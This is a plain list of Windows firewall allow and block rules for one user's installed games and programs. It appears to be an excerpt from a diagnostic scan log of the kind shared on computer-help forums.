FirewallRules: [{64CA212E-02DE-4926-888F-932D5A1658A6}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{1EB9A2B0-32B8-4606-8F5E-990497197793}] => (Allow) D:\Programs\qBittorrent\qbittorrent.exe
FirewallRules: [{9A971ED2-910F-498E-8390-C2A5B037F464}] => (Allow) D:\Programs\qBittorrent\qbittorrent.exe
FirewallRules: [{2F8503B1-F0F9-40F8-9EC6-2E3FAF24DEA5}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\System\Postal2.exe
FirewallRules: [{3BF2D93D-5674-4129-A442-E9CA4FD85D2E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\System\Postal2.exe
FirewallRules: [{B717B23B-3051-464E-B1A0-215065A4C435}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\ShareThePain\System\Postal2MP.exe
FirewallRules: [{1C54E52B-BE44-41D0-BBD6-0A0DB8BDCACA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\ShareThePain\System\Postal2MP.exe
FirewallRules: [{F6A9BA8B-3B79-4D7C-8452-8776EA1BB5DA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\Paradise Lost\System\ParadiseLost.exe
FirewallRules: [{DDD60C21-A290-4323-B9C0-784644379B0A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\Paradise Lost\System\ParadiseLost.exe
FirewallRules: [{CD3F9234-9969-4F4C-9E9F-89D1C9B6A9B1}] => (Allow) F:\Games\SteamLibrary\steamapps\common\GodMode\bin\GodMode.exe
FirewallRules: [{3D231E09-B2A9-4153-A1AC-78C9DADDAA20}] => (Allow) F:\Games\SteamLibrary\steamapps\common\GodMode\bin\GodMode.exe
FirewallRules: [{7B5D1A10-552F-402D-80B9-3095384A565A}] => (Allow) F:\Program Files (x86)\Origin Games\Mass Effect 2\Binaries\MassEffect2.exe
FirewallRules: [{047C63FA-8863-4B8F-92BD-D23A28E05CC6}] => (Allow) F:\Program Files (x86)\Origin Games\Mass Effect 2\Binaries\MassEffect2.exe
FirewallRules: [TCP Query User{CEBE6347-DAC3-4066-886E-5F370A9C18F5}C:\program files (x86)\pc remote\pc remote\pcremote.exe] => (Allow) C:\program files (x86)\pc remote\pc remote\pcremote.exe
FirewallRules: [UDP Query User{2A2191F0-06F4-43A1-9C08-3CAEE0718E8C}C:\program files (x86)\pc remote\pc remote\pcremote.exe] => (Allow) C:\program files (x86)\pc remote\pc remote\pcremote.exe
FirewallRules: [{A8AD7DC0-805E-4626-AE38-D6C5B4AFB73D}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout Shelter\FalloutShelter.exe
FirewallRules: [{FC0B0A49-E0E9-4BE3-90D3-82CA9733F90E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout Shelter\FalloutShelter.exe
FirewallRules: [{EEC8CDB4-1A90-4EE4-99F4-E717C762A9A6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C647E6AF-81E7-4D32-A057-1D0C52BB4E3B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{745D3D0C-F814-4A45-867D-2735BF2607DF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\NewZ\NewZLauncher.exe
FirewallRules: [{80AEF1F6-D1D8-4E27-82BF-70CB5DD0ED46}] => (Allow) F:\Games\SteamLibrary\steamapps\common\NewZ\NewZLauncher.exe
FirewallRules: [TCP Query User{EE928019-B6A5-4384-819A-7427A2D5B6A1}F:\games\steamlibrary\steamapps\common\newz\thenewz.exe] => (Allow) F:\games\steamlibrary\steamapps\common\newz\thenewz.exe
FirewallRules: [UDP Query User{A97EBDCE-31BD-4AC6-8130-8A8C22E13985}F:\games\steamlibrary\steamapps\common\newz\thenewz.exe] => (Allow) F:\games\steamlibrary\steamapps\common\newz\thenewz.exe
FirewallRules: [{EA036D3A-0F9D-49E4-83C1-1926D68003EA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\TheEvilWithin\EvilWithin.exe
FirewallRules: [{F539408E-8B01-42AC-9CAB-23DEC828C86A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\TheEvilWithin\EvilWithin.exe
FirewallRules: [{15248D59-4E91-4D82-98ED-4F3B874089C2}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Subnautica\Subnautica.exe
FirewallRules: [{7C0390B7-0362-4D4A-AB88-1648E24ABB4E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Subnautica\Subnautica.exe
FirewallRules: [{85596A95-48A7-42C4-AB3E-49A4D6DC3994}] => (Allow) F:\Games\SteamLibrary\steamapps\common\STALKER Shadow of Chernobyl\bin\XR_3DA.exe
FirewallRules: [{787D58BB-3074-417F-A3EC-F620ADA57304}] => (Allow) F:\Games\SteamLibrary\steamapps\common\STALKER Shadow of Chernobyl\bin\XR_3DA.exe
FirewallRules: [{9665A8ED-598C-476F-A3BA-A7E6A9AD9731}] => (Allow) F:\Games\SteamLibrary\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [{3C536DE5-E2E4-433D-906B-D8F3E7E73FD2}] => (Allow) F:\Games\SteamLibrary\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [TCP Query User{EFAF80F5-11C3-4AC4-B4EE-4BCD4598F6AC}F:\games\steamlibrary\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Allow) F:\games\steamlibrary\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [UDP Query User{1C99FA29-2B8D-4A15-B728-7CBBA6895B58}F:\games\steamlibrary\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Allow) F:\games\steamlibrary\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [{C6ABF93A-208A-460B-BFCF-D4AAF79D3E28}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Darksiders II Deathinitive Edition\Darksiders2.exe
FirewallRules: [{2A8048D4-7EDC-44E4-B616-F21C706B7989}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Darksiders II Deathinitive Edition\Darksiders2.exe
FirewallRules: [{5C1D1740-5233-44F5-AFA7-F56C7E738E4E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Darksiders Warmastered Edition\darksiders1.exe
FirewallRules: [{24E0015A-05B2-4D0F-AE05-674F04B6E96C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Darksiders Warmastered Edition\darksiders1.exe
FirewallRules: [{025DA520-8003-4BFA-9F0B-9104145FB8CD}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\System\witcher.exe
FirewallRules: [{3E02B0C6-F7DF-4C8C-A84C-3BF023B0D28C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\System\witcher.exe
FirewallRules: [{16878F97-12BB-4EC8-992E-5CA56990EAD3}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\System\djinni!.exe
FirewallRules: [{D9C69A97-E017-4601-A9CB-3A06E2CF2C15}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\System\djinni!.exe
FirewallRules: [{D95156A7-FB19-4C03-A1FA-9F2191B9B201}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\Digital Comic\DigitalComic.exe
FirewallRules: [{10024D50-A026-403A-ACE9-D5E3A9BC8CC8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\Digital Comic\DigitalComic.exe
FirewallRules: [{E7A0D9BA-B90E-4940-81BD-8BAF5D327156}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout\FalloutLauncher.exe
FirewallRules: [{2B8C8707-BB6E-4E31-91C1-D842B652B037}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout\FalloutLauncher.exe
FirewallRules: [{5D942906-26CC-40BC-9216-2D62726B2BAF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout 2\Fallout2Launcher.exe
FirewallRules: [{49571136-B190-47BD-84DC-1C2140DDAC67}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout 2\Fallout2Launcher.exe
FirewallRules: [{22C94A03-1654-42C3-91E6-7FB068C0E76B}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout 3 goty\FalloutLauncher.exe
FirewallRules: [{A34D45F3-89EE-4637-B1AA-9C851281BCEE}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout 3 goty\FalloutLauncher.exe
FirewallRules: [{C6561AA8-55FB-46C3-A5A3-85A705A75137}] => (Allow) F:\Games\SteamLibrary\steamapps\common\STALKER Clear Sky\bin\xrEngine.exe
FirewallRules: [{8E4CEC95-6D6E-4D48-8152-5C471D9F413C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\STALKER Clear Sky\bin\xrEngine.exe
FirewallRules: [{7704A97B-8EF6-4695-9CB8-FF4DC082D5DF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{1AD80FDD-84A5-459D-B509-668DF680435A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{6C0E892F-03D5-4186-9F86-B4A1943BCD84}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Stalker Call of Pripyat\bin\xrEngine.exe
FirewallRules: [{FAA4BCC9-EDC7-4319-B028-7DB2BC6172E2}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Stalker Call of Pripyat\bin\xrEngine.exe
FirewallRules: [{765ECDBE-1A5A-4B69-A976-43403DFBF19A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{AE52188A-E7BD-41A1-8393-AFC03B83A050}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{D7932B6B-B02E-4482-AC2F-55CBCCF99CE3}] => (Allow) F:\Games\SteamLibrary\steamapps\common\SleepingDogsDefinitiveEdition\sdhdship.exe
FirewallRules: [{1A536A82-E3A1-48D3-8BF7-1D0C7A4AC320}] => (Allow) F:\Games\SteamLibrary\steamapps\common\SleepingDogsDefinitiveEdition\sdhdship.exe
FirewallRules: [{455B43AA-ED12-465F-94C9-623AB8D4B422}] => (Allow) F:\Games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe
FirewallRules: [{DE53AB56-F3EC-4E32-A670-9B46A1CC1CA0}] => (Allow) F:\Games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe
FirewallRules: [{2183BEBC-4A02-4E48-B2FF-7D5DB0CB56E2}] => (Allow) F:\Games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{E69193B8-7C7A-41E5-8B3A-5A6FD2B1156A}] => (Allow) F:\Games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{A6CC254F-C003-4EE1-8AB3-F759AC82A21C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\NieRAutomata\NieRAutomata.exe
FirewallRules: [{CCA8257E-D593-4E35-91C7-11F29AD3F2E8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\NieRAutomata\NieRAutomata.exe
FirewallRules: [{7DC0E4BA-9A3D-45D7-A483-DF4E783FE4CF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Elder Scrolls Legends\The Elder Scrolls Legends.exe
FirewallRules: [{703AC66F-2071-49A8-A8C8-C5651A6E1DF7}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Elder Scrolls Legends\The Elder Scrolls Legends.exe
FirewallRules: [{E52F6BF7-DC3C-4AE7-AE31-3F6A7508694E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{1E12EA9B-1ED5-437F-8142-3E4CC805A1B0}] => (Allow) F:\Games\SteamLibrary\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{4D297B8F-7445-4750-9423-BA7C1AFC7BDE}] => (Allow) F:\Games\SteamLibrary\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{1AE489AB-F47B-461B-85B5-89210470FA03}] => (Allow) F:\Games\SteamLibrary\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{5181C2ED-F03C-47AC-9957-CCEB351D1F0F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{BC9724B9-1B94-464C-900F-2E29BB8EDDD1}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{EFF5F247-C02F-482C-A023-F6D996ECBE04}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{1BA97A77-0CEA-48C0-8260-E9618EDF2F96}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [TCP Query User{02DC4F45-70AE-4001-B508-FCF40D313A60}F:\games\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe
FirewallRules: [UDP Query User{B39AFC56-51A6-490C-8165-9FE7478B47A1}F:\games\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe
FirewallRules: [TCP Query User{78C01DCE-D7BE-4083-9390-7A1F425D4204}F:\games\steamlibrary\steamapps\common\darkestdungeon\_windowsnosteam\darkest.exe] => (Allow) F:\games\steamlibrary\steamapps\common\darkestdungeon\_windowsnosteam\darkest.exe
FirewallRules: [UDP Query User{983CAD0A-6816-482B-AA2E-AA851B5BAF93}F:\games\steamlibrary\steamapps\common\darkestdungeon\_windowsnosteam\darkest.exe] => (Allow) F:\games\steamlibrary\steamapps\common\darkestdungeon\_windowsnosteam\darkest.exe
FirewallRules: [TCP Query User{95A6A7A0-0F8B-42C5-A4FD-C0448E7F56B4}F:\programs\jdownloader\jdownloader2.exe] => (Allow) F:\programs\jdownloader\jdownloader2.exe
FirewallRules: [UDP Query User{44201E29-AD28-4D31-B03E-5ACCE31FEEE5}F:\programs\jdownloader\jdownloader2.exe] => (Allow) F:\programs\jdownloader\jdownloader2.exe
FirewallRules: [{031F5188-5835-469B-9CA6-BDD04AB6ED63}] => (Allow) LPort=11155
FirewallRules: [{138D2E15-D8D2-4830-A983-91D338FD83B8}] => (Allow) LPort=11155
FirewallRules: [TCP Query User{B4C2E639-9A2E-4ED4-9B3E-52FFC01441A6}F:\games\steamlibrary\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) F:\games\steamlibrary\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{A031AF72-A066-4832-A4C4-C562F5ADBCF4}F:\games\steamlibrary\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) F:\games\steamlibrary\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{5DD8263F-1D88-4A1A-B97F-E6FF678EDD1F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{AC61160C-630D-4569-A484-080350353C20}] => (Allow) F:\Games\SteamLibrary\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{C3715C64-4057-4447-AE51-708141782230}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher 3\bin\x64\witcher3.exe
FirewallRules: [{FDB104D6-6B9B-43A4-A120-31CD1A6B6D28}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher 3\bin\x64\witcher3.exe
FirewallRules: [{4A9F13A2-E3A8-485B-A3E6-0A323ED5D4F6}] => (Allow) F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\launcher.exe
FirewallRules: [{439D97E4-90CD-490A-8370-3598428F5483}] => (Allow) F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\launcher.exe
FirewallRules: [{33B63657-ACBF-4D74-BDA0-26281623E54C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\H1Z1\LaunchPad.exe
FirewallRules: [{78798D76-ABB7-47F0-903C-D2BD68D9B581}] => (Allow) F:\Games\SteamLibrary\steamapps\common\H1Z1\LaunchPad.exe
FirewallRules: [TCP Query User{4997044F-7EC0-4E62-8EAF-B3A93E9A6B87}D:\programs\qbittorrent\qbittorrent.exe] => (Allow) D:\programs\qbittorrent\qbittorrent.exe
FirewallRules: [UDP Query User{39623C73-58B3-4C6B-A844-9C254FCDC54C}D:\programs\qbittorrent\qbittorrent.exe] => (Allow) D:\programs\qbittorrent\qbittorrent.exe
FirewallRules: [{E204925D-468E-4543-9C46-31D6E2A42D30}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{1497FF98-0A01-4807-B005-89ABA6E86635}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{90F79D59-8E0C-41F4-AC7A-5BF8FD467A81}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{C72B5A78-29C8-4304-B290-755D876814BA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [TCP Query User{FAAB7574-DAD6-4D8B-920E-933E2595285C}F:\programs\vlc\vlc.exe] => (Block) F:\programs\vlc\vlc.exe
FirewallRules: [UDP Query User{1E1D6BCD-5724-4006-91C0-60BE009CB41F}F:\programs\vlc\vlc.exe] => (Block) F:\programs\vlc\vlc.exe
FirewallRules: [{39184E4A-A70F-4EA8-9F5D-5EE7465AAF77}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DOOM\DOOMx64.exe
FirewallRules: [{1F2921E8-A450-4D61-8A05-1D9C58B2963B}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DOOM\DOOMx64.exe
FirewallRules: [{5527349A-5450-456C-B9C3-224714F3BA42}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{8CBFCD4E-919E-4A59-B322-EE2A6806A153}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{E3FEF137-B031-48A5-9E21-A0ABF90361E1}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Deus Ex\System\DeusEx.exe
FirewallRules: [{CD7884B1-6EF0-4785-9BAB-B359DE4630FA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Deus Ex\System\DeusEx.exe
FirewallRules: [{39286275-10A2-4B81-9F46-58AF1FBA97DF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Deus Ex Human Revolution Director's Cut\DXHRDC.exe
FirewallRules: [{C59D0976-9C4C-4835-8E16-4D4580B89060}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Deus Ex Human Revolution Director's Cut\DXHRDC.exe
FirewallRules: [{5C7E0383-3AF3-4B1A-80E7-A6A81347CA35}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dead Space 2\deadspace2.exe
FirewallRules: [{D5FD362E-D400-4C3F-99EA-7F27937BF7C8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dead Space 2\deadspace2.exe
FirewallRules: [{D822C85C-3702-4207-AED3-E86F65CF7EF0}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Cryptic Studios\Neverwinter.exe
FirewallRules: [{10D84C9F-1C7D-46C0-A1C4-ED001313B430}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Cryptic Studios\Neverwinter.exe
FirewallRules: [{DBE37F76-058E-452A-9FF9-19B649AFC2C5}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Metro 2033 Redux\metro.exe
FirewallRules: [{58F9B0D5-5568-4992-B403-176F4BA1825C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Metro 2033 Redux\metro.exe
FirewallRules: [{40F04ADD-AFFC-45AC-977F-9F541A0EFFBF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Metro Last Light Redux\metro.exe
FirewallRules: [{D461C694-C414-437B-950F-D17FE6B28238}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Metro Last Light Redux\metro.exe
FirewallRules: [{CC196791-0C3E-4119-873E-939203000209}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{9F723490-2612-4439-BDD5-50CFCF0E7A37}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{CFE49AA4-DE7A-42DF-8990-9A4170A17345}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{0BEA7189-4A91-452A-B862-083502CA990C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{FD597A10-EAE7-4AC6-A8A6-E5D8AC7C2F4F}] => (Allow) F:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{9F0B6A52-3888-4E1E-B1E7-D5F2A65BCA0B}] => (Allow) F:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{AAEE3547-3FA3-4CC1-8686-2F4A2B977191}] => (Allow) F:\Games\SteamLibrary\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{D9D0F0CF-E06D-4754-BCCB-FE421D0AEC8F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{4233752D-14AA-42FA-B2E3-D3E45F409670}] => (Allow) C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe
FirewallRules: [{CCED513B-60CA-4A86-91B7-67C53CC8106D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{083161D9-D5A6-4091-BBFF-ED0BDE51F015}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [TCP Query User{7CF32632-5947-4A2A-B309-0644376DEEB9}C:\programdata\oracle\java\javapath_target_702566\java.exe] => (Allow) C:\programdata\oracle\java\javapath_target_702566\java.exe
FirewallRules: [UDP Query User{4FCFFB0A-442C-4E79-9DC4-138966598842}C:\programdata\oracle\java\javapath_target_702566\java.exe] => (Allow) C:\programdata\oracle\java\javapath_target_702566\java.exe
FirewallRules: [TCP Query User{03E8A54A-289B-4DFB-9F57-72C1F5E4B0DD}C:\program files\java\jre1.8.0_144\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_144\bin\javaw.exe
FirewallRules: [UDP Query User{EEA760C7-FDCA-4018-AE61-D6E59C5423BC}C:\program files\java\jre1.8.0_144\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_144\bin\javaw.exe
FirewallRules: [TCP Query User{BB69F2CC-A771-465F-A6CE-078181DDD1BF}F:\games\steamlibrary\steamapps\common\metro last light redux\metro_benchmark.exe] => (Block) F:\games\steamlibrary\steamapps\common\metro last light redux\metro_benchmark.exe
FirewallRules: [UDP Query User{E285FEA0-8338-4837-8C67-DE4302F94917}F:\games\steamlibrary\steamapps\common\metro last light redux\metro_benchmark.exe] => (Block) F:\games\steamlibrary\steamapps\common\metro last light redux\metro_benchmark.exe
FirewallRules: [{909EF1F0-C846-4912-BD48-E9394C2D1E9F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Assassin's Creed Unity\ACU.exe
FirewallRules: [{5C5A3231-44E4-4BC0-B867-414638563140}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Assassin's Creed Unity\ACU.exe
FirewallRules: [TCP Query User{41FBDD39-5C60-4BBD-9E8B-99270A95BB8A}C:\users\sblck\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\sblck\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [UDP Query User{7415BC39-8B02-4E87-B3E1-B41F5C5A9BDC}C:\users\sblck\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\sblck\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [{06FA0781-21B8-4F5F-BA9E-83D70E543B4F}] => (Allow) C:\Program Files\Nexus Mod Manager\NexusClient.exe
FirewallRules: [{FEFD41B7-1BCC-421E-892B-EE3F26023CFF}] => (Allow) C:\Program Files\Nexus Mod Manager\NexusClient.exe
FirewallRules: [{6078CE2E-0B79-4B93-A350-F643B1D40340}] => (Allow) C:\Program Files\Nexus Mod Manager\NexusClient.exe
FirewallRules: [{D99E7FAD-F214-4746-A162-7E71335EA9EB}] => (Allow) C:\Program Files\Nexus Mod Manager\NexusClient.exe
FirewallRules: [TCP Query User{7C99F9CA-DBD3-4684-B0D8-2C3F1F82CAA4}F:\games\divinity original sin 2\bin\eocapp.exe] => (Allow) F:\games\divinity original sin 2\bin\eocapp.exe
FirewallRules: [UDP Query User{DCD3D02D-138F-4BDD-B2BD-764252E127C9}F:\games\divinity original sin 2\bin\eocapp.exe] => (Allow) F:\games\divinity original sin 2\bin\eocapp.exe
FirewallRules: [{3794FD8A-8DAD-42DE-8232-4F85AE412E35}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7C361E2E-FF31-4315-AF41-A5F698A186AD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{CE045AE6-17A5-447A-AEA9-C6704EA58365}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{818607AC-0C05-4BC2-A8AB-C36785942C7E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{8F38296E-6EB7-4BE5-A9B4-3A827146C9FC}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{2326BAC4-D6C8-44BB-9D14-C3C38ABC5370}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{6B401CD0-2417-4969-87AE-F36D85CF1FDC}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{A178CFBB-E0D8-4C65-ADFB-C2D2262D5B31}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{FC38FBD7-265E-4530-AD59-40835C97A79C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{C4B563DA-AB91-4709-B091-E19741CE9D1A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{EE43546A-E249-4E6F-99EF-29A58803129A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{2A709177-46CD-4EC7-9E27-1746DD2571A5}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{4A574DE0-77BB-4D2C-80ED-5E6E37F0451C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{0F5946F7-5D76-42B6-9D41-1C4ECA044011}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{1FE677C7-E5F7-4AC9-9569-33AA7F92D640}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{C08CD677-D6EC-4884-9D61-F5A4A1451237}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [TCP Query User{E380F1FF-E610-44C1-BE38-78D7F9161A87}C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe] => (Block) C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [UDP Query User{C9D2A49F-DF9D-4446-AEDD-2608F95499B6}C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe] => (Block) C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [TCP Query User{98F2827D-C85B-4294-A084-2A3EC907FA9A}F:\games\steamlibrary\steamapps\common\fallout 4\creationkit.exe] => (Allow) F:\games\steamlibrary\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [UDP Query User{6D21133F-BD5D-41D5-A4E9-172DCD672AC2}F:\games\steamlibrary\steamapps\common\fallout 4\creationkit.exe] => (Allow) F:\games\steamlibrary\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [{9F0ECF3E-8417-4FC0-A60E-E03B7B2CEAF7}] => (Allow) F:\Games\SteamLibrary\steamapps\common\War Thunder\launcher.exe
FirewallRules: [{E06CCCFA-30AB-460B-BB18-B046301C87A6}] => (Allow) F:\Games\SteamLibrary\steamapps\common\War Thunder\launcher.exe
FirewallRules: [TCP Query User{0999E2BF-F981-4CE7-B481-CC85BBDA17BD}F:\games\steamlibrary\steamapps\common\war thunder\win64\aces.exe] => (Allow) F:\games\steamlibrary\steamapps\common\war thunder\win64\aces.exe
FirewallRules: [UDP Query User{76E07B75-63A6-45EA-B92A-A4A337FD76CA}F:\games\steamlibrary\steamapps\common\war thunder\win64\aces.exe] => (Allow) F:\games\steamlibrary\steamapps\common\war thunder\win64\aces.exe
